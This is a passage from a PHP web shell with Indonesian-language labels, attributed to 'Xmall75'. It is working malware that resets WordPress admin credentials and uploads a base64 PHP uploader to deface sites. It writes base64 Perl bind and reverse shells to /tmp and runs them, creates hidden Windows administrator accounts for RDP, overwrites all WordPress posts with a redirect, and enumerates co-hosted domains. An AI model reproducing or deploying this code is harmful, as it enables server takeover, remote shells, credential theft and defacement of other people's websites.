2079 $sha1complete = sha1($sha256.$sha384.$sha512.$pass); // sha1 - sha256 - sha384 - sha512
2080 $hash1_sha1 = sha1($salt . $pass); // sha1 hash with salt
2081 $hash1_sha1_double = sha1(md5($salt . $pass)); // sha1 hash with salt & md5
2082 $crypt = crypt($pass); // crypt hash
2083
2084
2085 }
2086 echo '<form action="" method="post"><b> ';
2087
2088 echo "<font color='lime'> Kata : ";
2089 echo "<br>";
2090 echo '<input type="text" name="password" size="50" />';
2091 echo '<input type="submit" name="go" value=">>" />';
2092 echo '<br>';
2093 echo '<br>';
2094 echo "<span style='color: lime; font-size: 16px;'>Password lu : </span><span style='color: red; size: 14px;'>".$pass."</span>";
2095 echo '<br>';
2096 echo '<br>';
2097 echo '<h2>Hasil Hash</h2></th></center></tr>';
2098 echo '<br>';
2099 echo ' Crypt - MD5(Unix) <br> <input style="cursor: text;" type=text size=50 readonly="readonly" value='.$crypt.'><br><br>';
2100 echo ' MD5 <br> <input style="cursor: text;" type=text size=50 readonly="readonly" value=' . $hash . '> <br><br>';
2101 echo ' MD2 <br> <input style="cursor: text;" type=text size=50 readonly="readonly" value=' . $md2 . '> <br><br>';
2102 echo ' MD4 <br> <input style="cursor: text;" type=text size=50 readonly="readonly" value=' . $md4 . '> <br><br>';
2103 echo ' MD5 with MD4 - MD2 <br> <input style="cursor: text;" type=text size=50 readonly="readonly" value='.$md5_md4_md2.'><br><br>';
2104 echo ' MD5 with Salt <br> <input style="cursor: text;" type=text size=50 readonly="readonly" value=' . $hash_md5 . '> <br><br>';
2105 echo ' MD5 with Salt & Sha1 <br> <input style="cursor: text;" type=text size=50 readonly="readonly" value=' . $hash_md5_double . '> <br><br>';
2106 echo ' Sha1 <br> <input style="cursor: text;" type=text size=50 readonly="readonly" value=' . $hash1 . '> <br><br>';
2107 echo ' Sha256 <br> <input style="cursor: text;" type=text size=50 readonly="readonly" value=' . $sha256 . '> <br><br>';
2108 echo ' Sha384 <br> <input style="cursor: text;" type=text size=50 readonly="readonly" value=' . $sha384 . '> <br><br>';
2109 echo ' Sha512 <br> <input style="cursor: text;" type=text size=50 readonly="readonly" value=' . $sha512 . '> <br><br>';
2110 echo ' Sha1 with Sha256 - Sha384 - Sha512 <br> <input style="cursor: text;" type=text size=50 readonly="readonly" value=' . $sha1complete . '> <br><br>';
2111 echo ' Sha1 with Salt <br> <input style="cursor: text;" type=text size=50 readonly="readonly" value=' . $hash1_sha1 . '> <br><br>';
2112 echo ' Sha1 with Salt & MD5 <br> <input style="cursor: text;" type=text size=50 readonly="readonly" value=' . $hash1_sha1_double . '> </font><br><br>';
2113
2114} elseif($_GET['do'] == 'adminer') {
2115 $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
2116 function adminer($url, $isi) {
2117 $fp = fopen($isi, "w");
2118 $ch = curl_init();
2119 curl_setopt($ch, CURLOPT_URL, $url);
2120 curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
2121 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
2122 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
2123 curl_setopt($ch, CURLOPT_FILE, $fp);
2124 return curl_exec($ch);
2125 curl_close($ch);
2126 fclose($fp);
2127 ob_flush();
2128 flush();
2129 }
2130 if(file_exists('adminer.php')) {
2131 echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
2132 } else {
2133 if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
2134 echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
2135 } else {
2136 echo "<center><font color=red>gagal buat file adminer</font></center>";
2137 }
2138 }
2139} elseif($_GET['do'] == 'auto_dwp') {
2140 if($_POST['auto_deface_wp']) {
2141 function anucurl($sites) {
2142 $ch = curl_init($sites);
2143 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2144 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2145 curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
2146 curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
2147 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
2148 curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
2149 curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
2150 curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
2151 curl_setopt($ch, CURLOPT_COOKIESESSION, true);
2152 $data = curl_exec($ch);
2153 curl_close($ch);
2154 return $data;
2155 }
2156 function lohgin($cek, $web, $userr, $pass, $wp_submit) {
2157 $post = array(
2158 "log" => "$userr",
2159 "pwd" => "$pass",
2160 "rememberme" => "forever",
2161 "wp-submit" => "$wp_submit",
2162 "redirect_to" => "$web",
2163 "testcookie" => "1",
2164 );
2165 $ch = curl_init($cek);
2166 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2167 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2168 curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
2169 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
2170 curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
2171 curl_setopt($ch, CURLOPT_POST, 1);
2172 curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
2173 curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
2174 curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
2175 curl_setopt($ch, CURLOPT_COOKIESESSION, true);
2176 $data = curl_exec($ch);
2177 curl_close($ch);
2178 return $data;
2179 }
2180 $scan = $_POST['link_config'];
2181 $link_config = scandir($scan);
2182 $script = htmlspecialchars($_POST['script']);
2183 $user = "Xmall75";
2184 $pass = "Xmall75";
2185 $passx = md5($pass);
2186 foreach($link_config as $dir_config) {
2187 if(!is_file("$scan/$dir_config")) continue;
2188 $config = file_get_contents("$scan/$dir_config");
2189 if(preg_match("/WordPress/", $config)) {
2190 $dbhost = ambilkata($config,"DB_HOST', '","'");
2191 $dbuser = ambilkata($config,"DB_USER', '","'");
2192 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
2193 $dbname = ambilkata($config,"DB_NAME', '","'");
2194 $dbprefix = ambilkata($config,"table_prefix = '","'");
2195 $prefix = $dbprefix."users";
2196 $option = $dbprefix."options";
2197 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
2198 $db = mysql_select_db($dbname);
2199 $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
2200 $result = mysql_fetch_array($q);
2201 $id = $result[ID];
2202 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
2203 $result2 = mysql_fetch_array($q2);
2204 $target = $result2[option_value];
2205 if($target == '') {
2206 echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
2207 } else {
2208 echo "[+] $target <br>";
2209 }
2210 $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
2211 if(!$conn OR !$db OR !$update) {
2212 echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
2213 mysql_close($conn);
2214 } else {
2215 $site = "$target/wp-login.php";
2216 $site2 = "$target/wp-admin/theme-install.php?upload";
2217 $b1 = anucurl($site2);
2218 $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
2219 $b = lohgin($site, $site2, $user, $pass, $wp_sub);
2220 $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
2221 $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
2222 $www = "m.php";
2223 $fp5 = fopen($www,"w");
2224 fputs($fp5,$upload3);
2225 $post2 = array(
2226 "_wpnonce" => "$anu2",
2227 "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
2228 "themezip" => "@$www",
2229 "install-theme-submit" => "Install Now",
2230 );
2231 $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
2232 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2233 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2234 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
2235 curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
2236 curl_setopt($ch, CURLOPT_POST, 1);
2237 curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
2238 curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
2239 curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
2240 curl_setopt($ch, CURLOPT_COOKIESESSION, true);
2241 $data3 = curl_exec($ch);
2242 curl_close($ch);
2243 $y = date("Y");
2244 $m = date("m");
2245 $namafile = "id.php";
2246 $fpi = fopen($namafile,"w");
2247 fputs($fpi,$script);
2248 $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
2249 curl_setopt($ch6, CURLOPT_POST, true);
2250 curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
2251 curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
2252 curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
2253 curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
2254 curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
2255 $postResult = curl_exec($ch6);
2256 curl_close($ch6);
2257 $as = "$target/k.php";
2258 $bs = anucurl($as);
2259 if(preg_match("#$script#is", $bs)) {
2260 echo "[+] <font color='lime'>berhasil mepes...</font><br>";
2261 echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
2262 } else {
2263 echo "[-] <font color='red'>gagal mepes...</font><br>";
2264 echo "[!!] coba aja manual: <br>";
2265 echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
2266 echo "[+] username: <font color=lime>$user</font><br>";
2267 echo "[+] password: <font color=lime>$pass</font><br><br>";
2268 }
2269 mysql_close($conn);
2270 }
2271 }
2272 }
2273 } else {
2274 echo "<center><h1>WordPress Auto Deface</h1>
2275 <form method='post'>
2276 <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
2277 <input type='text' name='script' height='10' size='50' placeholder='Hacked by Xmall75 - Security Cyber Art' required><br>
2278 <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
2279 </form>
2280 <br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>
2281 </center>";
2282 }
2283} elseif($_GET['do'] == 'auto_dwp2') {
2284 if($_POST['auto_deface_wp']) {
2285 function anucurl($sites) {
2286 $ch = curl_init($sites);
2287 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2288 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2289 curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
2290 curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
2291 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
2292 curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
2293 curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
2294 curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
2295 curl_setopt($ch, CURLOPT_COOKIESESSION,true);
2296 $data = curl_exec($ch);
2297 curl_close($ch);
2298 return $data;
2299 }
2300 function lohgin($cek, $web, $userr, $pass, $wp_submit) {
2301 $post = array(
2302 "log" => "$userr",
2303 "pwd" => "$pass",
2304 "rememberme" => "forever",
2305 "wp-submit" => "$wp_submit",
2306 "redirect_to" => "$web",
2307 "testcookie" => "1",
2308 );
2309 $ch = curl_init($cek);
2310 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2311 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2312 curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
2313 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
2314 curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
2315 curl_setopt($ch, CURLOPT_POST, 1);
2316 curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
2317 curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
2318 curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
2319 curl_setopt($ch, CURLOPT_COOKIESESSION, true);
2320 $data = curl_exec($ch);
2321 curl_close($ch);
2322 return $data;
2323 }
2324 $link = explode("\r\n", $_POST['link']);
2325 $script = htmlspecialchars($_POST['script']);
2326 $user = "Xmall75";
2327 $pass = "Xmall75";
2328 $passx = md5($pass);
2329 foreach($link as $dir_config) {
2330 $config = anucurl($dir_config);
2331 $dbhost = ambilkata($config,"DB_HOST', '","'");
2332 $dbuser = ambilkata($config,"DB_USER', '","'");
2333 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
2334 $dbname = ambilkata($config,"DB_NAME', '","'");
2335 $dbprefix = ambilkata($config,"table_prefix = '","'");
2336 $prefix = $dbprefix."users";
2337 $option = $dbprefix."options";
2338 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
2339 $db = mysql_select_db($dbname);
2340 $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
2341 $result = mysql_fetch_array($q);
2342 $id = $result[ID];
2343 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
2344 $result2 = mysql_fetch_array($q2);
2345 $target = $result2[option_value];
2346 if($target == '') {
2347 echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
2348 } else {
2349 echo "[+] $target <br>";
2350 }
2351 $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
2352 if(!$conn OR !$db OR !$update) {
2353 echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
2354 mysql_close($conn);
2355 } else {
2356 $site = "$target/wp-login.php";
2357 $site2 = "$target/wp-admin/theme-install.php?upload";
2358 $b1 = anucurl($site2);
2359 $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
2360 $b = lohgin($site, $site2, $user, $pass, $wp_sub);
2361 $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
2362 $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
2363 $www = "m.php";
2364 $fp5 = fopen($www,"w");
2365 fputs($fp5,$upload3);
2366 $post2 = array(
2367 "_wpnonce" => "$anu2",
2368 "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
2369 "themezip" => "@$www",
2370 "install-theme-submit" => "Install Now",
2371 );
2372 $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
2373 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2374 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2375 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
2376 curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
2377 curl_setopt($ch, CURLOPT_POST, 1);
2378 curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
2379 curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
2380 curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
2381 curl_setopt($ch, CURLOPT_COOKIESESSION, true);
2382 $data3 = curl_exec($ch);
2383 curl_close($ch);
2384 $y = date("Y");
2385 $m = date("m");
2386 $namafile = "id.php";
2387 $fpi = fopen($namafile,"w");
2388 fputs($fpi,$script);
2389 $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
2390 curl_setopt($ch6, CURLOPT_POST, true);
2391 curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
2392 curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
2393 curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
2394 curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
2395 curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
2396 $postResult = curl_exec($ch6);
2397 curl_close($ch6);
2398 $as = "$target/k.php";
2399 $bs = anucurl($as);
2400 if(preg_match("#$script#is", $bs)) {
2401 echo "[+] <font color='lime'>berhasil mepes...</font><br>";
2402 echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
2403 } else {
2404 echo "[-] <font color='red'>gagal mepes...</font><br>";
2405 echo "[!!] coba aja manual: <br>";
2406 echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
2407 echo "[+] username: <font color=lime>$user</font><br>";
2408 echo "[+] password: <font color=lime>$pass</font><br><br>";
2409 }
2410 mysql_close($conn);
2411 }
2412 }
2413 } else {
2414 echo "<center><h1>WordPress Auto Deface V.2</h1>
2415 <form method='post'>
2416 Link Config: <br>
2417 <textarea name='link' placeholder='http://target.com/pastigans_config/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
2418 <input type='text' name='script' height='10' size='50' placeholder='Hacked by Xmall75 - Security Cyber Art' required><br>
2419 <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
2420 </form></center>";
2421 }
2422} elseif($_GET['do'] == 'network') {
2423 echo "<form method='post'>
2424 <u>Bind Port:</u> <br>
2425 PORT: <input type='text' placeholder='port' name='port_bind' value='6969'>
2426 <input type='submit' name='sub_bp' value='>>'>
2427 </form>
2428 <form method='post'>
2429 <u>Back Connect:</u> <br>
2430 Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>
2431 PORT: <input type='text' placeholder='port' name='port_bc' value='6969'>
2432 <input type='submit' name='sub_bc' value='>>'>
2433 </form>";
2434 $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
2435 if(isset($_POST['sub_bp'])) {
2436 $f_bp = fopen("/tmp/bp.pl", "w");
2437 fwrite($f_bp, base64_decode($bind_port_p));
2438 fclose($f_bp);
2439
2440 $port = $_POST['port_bind'];
2441 $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
2442 sleep(1);
2443 echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>";
2444 unlink("/tmp/bp.pl");
2445 }
2446 $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
2447 if(isset($_POST['sub_bc'])) {
2448 $f_bc = fopen("/tmp/bc.pl", "w");
2449 fwrite($f_bc, base64_decode($bind_connect_p));
2450 fclose($f_bc);
2451
2452 $ipbc = $_POST['ip_bc'];
2453 $port = $_POST['port_bc'];
2454 $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
2455 sleep(1);
2456 echo "<pre>".$out."\n".exe("ps aux | grep bc.pl")."</pre>";
2457 unlink("/tmp/bc.pl");
2458 }
2459} elseif($_GET['do'] == 'krdp_shell') {
2460 if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
2461 if($_POST['create']) {
2462 $user = htmlspecialchars($_POST['user']);
2463 $pass = htmlspecialchars($_POST['pass']);
2464 if(preg_match("/$user/", exe("net user"))) {
2465 echo "[INFO] -> <font color=red>user <font color=lime>$user</font> sudah ada</font>";
2466 } else {
2467 $add_user = exe("net user $user $pass /add");
2468 $add_groups1 = exe("net localgroup Administrators $user /add");
2469 $add_groups2 = exe("net localgroup Administrator $user /add");
2470 $add_groups3 = exe("net localgroup Administrateur $user /add");
2471 echo "[ RDP ACCOUNT INFO ]<br>
2472 ------------------------------<br>
2473 IP: <font color=lime>".$ip."</font><br>
2474 Username: <font color=lime>$user</font><br>
2475 Password: <font color=lime>$pass</font><br>
2476 ------------------------------<br><br>
2477 [ STATUS ]<br>
2478 ------------------------------<br>
2479 ";
2480 if($add_user) {
2481 echo "[add user] -> <font color='lime'>Berhasil</font><br>";
2482 } else {
2483 echo "[add user] -> <font color='red'>Gagal</font><br>";
2484 }
2485 if($add_groups1) {
2486 echo "[add localgroup Administrators] -> <font color='lime'>Berhasil</font><br>";
2487 } elseif($add_groups2) {
2488 echo "[add localgroup Administrator] -> <font color='lime'>Berhasil</font><br>";
2489 } elseif($add_groups3) {
2490 echo "[add localgroup Administrateur] -> <font color='lime'>Berhasil</font><br>";
2491 } else {
2492 echo "[add localgroup] -> <font color='red'>Gagal</font><br>";
2493 }
2494 echo "------------------------------<br>";
2495 }
2496 } elseif($_POST['s_opsi']) {
2497 $user = htmlspecialchars($_POST['r_user']);
2498 if($_POST['opsi'] == '1') {
2499 $cek = exe("net user $user");
2500 echo "Checking username <font color=lime>$user</font> ....... ";
2501 if(preg_match("/$user/", $cek)) {
2502 echo "[ <font color=lime>Sudah ada</font> ]<br>
2503 ------------------------------<br><br>
2504 <pre>$cek</pre>";
2505 } else {
2506 echo "[ <font color=red>belum ada</font> ]";
2507 }
2508 } elseif($_POST['opsi'] == '2') {
2509 $cek = exe("net user $user xmall75");
2510 if(preg_match("/$user/", exe("net user"))) {
2511 echo "[change password: <font color=lime>xmall75</font>] -> ";
2512 if($cek) {
2513 echo "<font color=lime>Berhasil</font>";
2514 } else {
2515 echo "<font color=red>Gagal</font>";
2516 }
2517 } else {
2518 echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
2519 }
2520 } elseif($_POST['opsi'] == '3') {
2521 $cek = exe("net user $user /DELETE");
2522 if(preg_match("/$user/", exe("net user"))) {
2523 echo "[remove user: <font color=lime>$user</font>] -> ";
2524 if($cek) {
2525 echo "<font color=lime>Berhasil</font>";
2526 } else {
2527 echo "<font color=red>Gagal</font>";
2528 }
2529 } else {
2530 echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
2531 }
2532 } else {
2533 //
2534 }
2535 } else {
2536 echo "-- Create RDP --<br>
2537 <form method='post'>
2538 <input type='text' name='user' placeholder='username' value='Xmall75' required>
2539 <input type='text' name='pass' placeholder='password' value='Xmall75' required>
2540 <input type='submit' name='create' value='>>'>
2541 </form>
2542 -- Option --<br>
2543 <form method='post'>
2544 <input type='text' name='r_user' placeholder='username' required>
2545 <select name='opsi'>
2546 <option value='1'>Cek Username</option>
2547 <option value='2'>Ubah Password</option>
2548 <option value='3'>Hapus Username</option>
2549 </select>
2550 <input type='submit' name='s_opsi' value='>>'>
2551 </form>
2552 ";
2553 }
2554 } else {
2555 echo "<font color=red>Fitur ini hanya dapat digunakan dalam Windows Server.</font>";
2556 }
2557
2558} elseif($_GET['do'] == 'wp_hijack') {
2559
2560 @ini_set('output_buffering',0);
2561
2562 echo '<form method="POST">
2563<br><center><span style="font-size:30px; font-family:Fredericka the Great; color:#1975FF">Wordpress Index Hijack Priv8</span></center><br>
2564<br><center><font color="#1975FF" size="2" face="orion">Coded By Mauritania Attacker</font></center><br>
2565<center><input type="text" value="localhost" name="pghost">
2566<input type="text" value="database_name" name="dbnmn">
2567<input type="text" value="prefix" name="prefix">
2568<input type="text" value="username_db" name="dbusrrrr">
2569<input type="text" value="password_db" name="pwddbbn"></center><br>
2570<center><textarea name="pown" cols="100" rows="7"><meta http-equiv="refresh" content="0;URL=http://pastebin.com/raw/PTShfKL9"></textarea><br><br>
2571<input type="submit" name="up2" value="Hijack Index"><br></center><form>';
2572
2573$pghost = $_POST['pghost'];
2574$dbnmn = $_POST['dbnmn'];
2575$dbusrrrr = $_POST['dbusrrrr'];
2576$pwddbbn = $_POST['pwddbbn'];
2577$index = stripslashes($_POST['pown']);
2578$prefix = $_POST['prefix'];
2579//$prefix = "wp_";
2580if ($_POST['up2']) {
2581@mysql_connect($pghost, $dbusrrrr, $pwddbbn) or die(mysql_error());
2582@mysql_select_db($dbnmn) or die(mysql_error());
2583$tableName = $prefix . "posts";
2584$ghost1 = mysql_query("UPDATE $tableName SET post_title ='" . $index . "' WHERE ID > 0 ");
2585if (!$ghost1) {
2586$ghost2 = mysql_query("UPDATE $tableName SET post_content ='" . $index . "' WHERE ID > 0 ");
2587} elseif (!$ghost2) {
2588$ghost3 = mysql_query("UPDATE $tableName SET post_name ='" . $index . "' WHERE ID > 0 ");
2589}
2590mysql_close();
2591if ($ghost1 || $ghost2 || $ghost3) {
2592echo "<center><p><b><font color='red'>Index Website Have been Hijacked Successfully</font></p></b></center>";
2593} else {
2594echo "<center><p><b><font color='red'>Failed To Hijack the Website :(</font></p></b></center>";
2595}
2596}
2597
2598} elseif($_GET['do'] == 'cms_detect') {
2599
2600 echo "<center><b><h2>[ CMS Detector ]</h2></b></center>";
2601
2602
2603 if(!file_exists('ganteng.tmp')){
2604@fopen('ganteng.tmp', 'w');
2605
2606echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
2607echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td><center><b>CMS</b></center></td></table>';
2608
2609$p = 0;
2610
2611if(is_readable("/var/named")){
2612$list = scandir("/var/named");
2613$current_dir = posix_getcwd();
2614$dir = explode("/",$current_dir);
2615foreach($list as $domain){
2616if(strpos($domain,".db"))
2617{
2618 $domain = str_replace('.db','',$domain);
2619 $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
2620
2621error_reporting(0);
2622
2623$link = $pageURL.'ganteng/'.$owner['name'];
2624
2625cms_add($link,$domain,$owner['name'],"WordPress");
2626cms_add($link,$domain,$owner['name'],"Joomla");
2627cms_add($link,$domain,$owner['name'],"vBulletin");
2628cms_add($link,$domain,$owner['name'],"WHMCS");
2629cms_add($link,$domain,$owner['name'],"PhpBB");
2630cms_add($link,$domain,$owner['name'],"MyBB");
2631cms_add($link,$domain,$owner['name'],"IPB");
2632cms_add($link,$domain,$owner['name'],"SMF");
2633cms_add($link,$domain,$owner['name'],"Drupal");
2634cms_add($link,$domain,$owner['name'],"e107");
2635cms_add($link,$domain,$owner['name'],"Seditio");
